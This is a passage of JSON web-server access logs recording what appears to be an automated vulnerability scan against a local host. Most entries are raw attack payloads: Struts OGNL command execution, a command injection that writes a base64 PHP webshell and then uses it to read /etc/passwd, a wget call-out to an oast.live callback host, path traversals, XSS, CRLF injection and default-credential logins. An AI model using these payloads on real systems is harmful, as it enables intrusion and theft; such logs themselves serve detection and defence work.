+0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/subscriptions HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.423","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /application.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.387","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.719","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.248","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /about/../tree?action=get HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.453","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php/example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.445","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/65 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.446","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /%u002e/WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /.%00/WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-config.php.orig HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.378","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"{\x0D\x0A \x22user_login\x22:\x2228fHqYWMBYIfFSJYz1VBmz7fXUS\x22,\x0D\x0A \x22password\x22:\x2228fHqYWMBYIfFSJYz1VBmz7fXUS\x22,\x0D\x0A \x22user_name\x22:\x2228fHqYWMBYIfFSJYz1VBmz7fXUS\x22,\x0D\x0A \x22user_email\x22:\x2228fHqYWMBYIfFSJYz1VBmz7fXUS@example.com\x22\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-json/buddypress/v1/signup HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.390","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.895","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.543","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/printenv.pl HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.545","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.386","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"ip=127.0.0.1|echo \x22PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K\x22|base64 -d > poc.php&mac=00-00","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /guest_auth/guestIsUp.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.468","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.138","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/autoconfig HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.476","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.354","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-config.php.original HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.354","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/setup-config.php?step=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.159","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /authorization.do HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.156","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.well-known/openid-configuration HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.369","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.141","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /aplicacao/application/configs/application.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.468","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.489","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/28fHqLo0sONZJkOEEEt1m9qLO2C.svg HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.412","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.808","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/66 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.450","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.367","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/lesson/1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.396","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.429","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https://////example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.993","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.361","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\x0D\x0AdataBlockSize=64\x0D\x0Atimeout=1\x0D\x0AnumberOfRepetitions=4\x0D\x0Ahost=$(echo 127.0.0.1; wget http://c9oms3gsmpve1ijt0mc09j1t51j9x61f9.oast.live)\x0D\x0AX_TP_ConnName=ewan_ipoe_d\x0D\x0AdiagnosticsState=Requested","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /cgi?2 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.147","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/mainFrame.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_wpeprivate/config.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.409","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.154","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /db/robomongo.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.789","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.784","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/67 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.346","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.435","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"username=root&password=admin","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /cgi-bin/luci/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.435","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.429","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?id=nuclei%25{128*128} HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.426","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cloudexp/application/configs/application.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.479","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/home HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.481","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.484","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.502","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/GetSrvInfo.exe HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.444","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /~user/%0D%0ASet-Cookie:crlfinjection HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.864","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.862","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.328","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https:///example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.337","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /robomongo.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.312","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.345","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /cgi?7 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.365","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/mainFrame.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.238","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET 